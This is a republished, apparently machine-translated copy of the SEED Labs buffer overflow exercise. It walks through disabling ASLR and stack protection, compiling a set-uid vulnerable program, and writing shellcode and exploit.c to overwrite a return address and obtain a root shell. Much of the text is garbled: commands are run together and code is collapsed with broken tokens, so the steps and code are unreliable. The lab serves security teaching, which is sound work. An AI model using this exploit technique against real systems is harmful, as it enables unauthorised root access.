Seed Information Security Experiment Series: Buffer Overflow Vulnerability experiment

Source: Internet
Author: User
Tags root access

Buffer Overflow Vulnerability Experiment This course is detailed from, please indicate the source of the reprint. First, the experimental description

A buffer overflow is a scenario in which a program attempts to write to a buffer beyond the pre-allocated fixed-length data. This vulnerability could be exploited by malicious users to alter the flow control of a program, or even execute arbitrary fragments of code. This vulnerability occurs because of a temporary shutdown of the data buffer and the return address, which causes the return address to be rewritten.

II. Preparation of the experiment

In order to facilitate the observation of the assembly statements, we need to operate in a 32-bit environment, so we need to do some preparation before the experiment.

1. Enter a command to install something that compiles a 32-bit C program:
sudo apt-get  updatesudo apt-get install lib32z1 libc6-dev-i386sudo apt-get Install Lib32readline-gplv2-dev

2. Enter the command "linux32" into the 32-bit Linux environment. At this point you will find that the command line is not as good as the tab completion, so enter "/bin/bash" Using bash:

Iii. Experimental Step 3.1 initial Setup

In Ubuntu and some other Linux systems, the initial address of random heap (heap) and stack (stack) is randomized using address space, which makes it difficult to guess the exact memory address, and guessing the memory address is the key to the buffer overflow attack. So in this experiment, we use the following command to turn off this feature:

sudo sysctl-w kernel.randomize_va_space=0

In addition, in order to further protect against buffer overflow attacks and other attacks using shell programs, many shell programs automatically abandon their privileges when called. Therefore, even if you can trick a set-uid program into invoking a shell, you cannot maintain root privileges in the shell, which is implemented in/bin/bash.

In a Linux system,/bin/sh is actually a symbolic link to/bin/bash or/bin/dash. To reproduce the situation before this protective measure was implemented, we used another shell program (zsh) instead of/bin/bash. The following instructions describe how to set up the ZSH program:

/-s zsh shexit

3.2 Shellcode

In general, a buffer overflow can cause a program to crash, and in the program, the overflow data overwrites the return address. And if the data that overwrites the return address is another address, then the program jumps to that address, and if the address is a piece of well-designed code to implement other functions, this code is shellcode.

Observe the following code:

#include <stdio.h>int  main () {char *name[2];name[0] = " /bin/sh '; name[1] = null;execve (name[0], name, NULL);}

The shellcode of this experiment is the compiled version of the code just now:

\x31\xc0\x50\x68"//sh"\x68"/bin"\x89\xe3\x50 \x53\x89\xe1\x99\xb0\x0b\xcd\x80

3.3 Vulnerability Procedures

Save the following code as a "stack.c" file and save it to the/tmp directory. The code is as follows:

/*stack.c*//*This program has a buffer overflow vulnerability.*//*Our task was to exploit this vulnerability*/#include<stdlib.h>#include<stdio.h>#include<string.h>intBoFChar*str) {Charbuffer[ A];/*The following statement has a buffer overflow problem*/strcpy (buffer, str);return 1;}intMainintargcChar**argv) {Charstr[517]; FILE*Badfile;badfile= fopen ("Badfile","R"); fread (str,sizeof(Char),517, Badfile), BOF (str);p rintf ("returned properly\n");return 1;}

The code lets you know that the program reads a file named "Badfile" and loads the contents of the file into "buffer".

Compile the program, and set the Set-uid. The command is as follows:

-m32-g-Z execstack-fno-stack-protector-o stack stack.cchmod u+s stackexit

The GCC compiler has a stack protection mechanism to prevent buffer overflows, so we need to use –fno-stack-protector to close this mechanism when compiling the code.

The-Z execstack is used to allow execution of the stack.

3.4 Attack Program

Our goal is to attack the vulnerability program just now and gain root access through the attack.

Save the following code as a "exploit.c" file and save it to the/tmp directory. The code is as follows:

/*exploit.c*//*A program This creates a file containing code for launching Shell*/#include<stdlib.h>#include<stdio.h>#include<string.h>Charshellcode[]="\x31\xc0"    //Xorl%eax,%eax"\x50"        //PUSHL%eax"\x68""//sh"  //PUSHL $0x68732f2f"\x68""/bin"  //PUSHL $0x6e69622f"\x89\xe3"    //MOVL%esp,%ebx"\x50"        //PUSHL%eax"\x53"        //PUSHL%ebx"\x89\xe1"    //MOVL%esp,%ecx"\x99"        //CDQ"\xb0\x0b"    //Movb $0x0b,%al"\xcd\x80"    //int $0x80;voidMainintargcChar**argv) {Charbuffer[517]; FILE*Badfile;/*Initialize buffer with 0x90 (NOP instruction)*/memset (&buffer,0x90,517);/*You need to fill the buffer with appropriate contents here*/strcpy (buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x?? \x?? \x?? \x??"); strcpy (Buffer+ -, shellcode);/*Save the contents to the file "Badfile"*/Badfile= fopen ("./badfile","W"); fwrite (buffer,517,1, Badfile); fclose (badfile);}

Notice the above code, "\x??" \x?? \x?? \x?? " Need to add shellcode to the address stored in memory because the location can overwrite the return address just after an overflow occurs.

and strcpy (Buffer+100,shellcode); This sentence tells us again that Shellcode is stored in the buffer+100 position.

Now we're going to get shellcode in-memory address, enter the command:

GDB Stackdisass Main


The next steps:

According to the statement strcpy (Buffer+100,shellcode); We calculate the address of Shellcode as 0xffffd1b0 (hex) +100 (decimal) =0xffffd214 (hexadecimal)

Modify EXPLOIT.C file Now! Will \x?? \x?? \x?? \x?? Modify to \x14\xd2\xff\xff

Then, compile the EXPLOIT.C program:

Gcc-m32-o Exploit exploit.c

3.5 Attack Results

Run the attack program exploit before running the vulnerability stack and observe the results:

Visible, through the attack, get the root permission!

If the attack succeeds and the "segment error" is indicated, re-use GDB disassembly to compute the memory address.

Iv. Exercise 1, follow the steps of the experiment, attack the vulnerability program and gain root privileges. 2, through the command "sudo sysctl-w kernel.randomize_va_space=2" to open the system's address space randomization mechanism, repeated use of exploit program to attack the stack program, to see if the attack succeeds, can gain root authority. 3, the/bin/sh to/bin/bash (or/bin/dash), to observe whether the attack succeeds, can gain root privileges.

Please complete the above practice in the lab building environment.


The experiment in this course comes from Syracuse SEED Labs, which is based on modifications to the site environment of the experimental building, and the modified experimental documents still follow the GNU Free Documentation License.

This course document GitHub link: Https://

Attached Syracuse SEED Labs copyright notice:

Copyright Statement Copyright 2006–2014 Wenliang Du, Syracuse University. The development of this document are funded by the National science Foundation ' s Course, curriculum, and Laboratory Improve ment (CCLI) program under award No. 0618680 and 0231122. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU free documentation Licens E, version 1.2 or any later version published by the Free software Foundation. A copy of the license can befound at

Seed Information Security Experiment Series: Buffer Overflow Vulnerability experiment

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.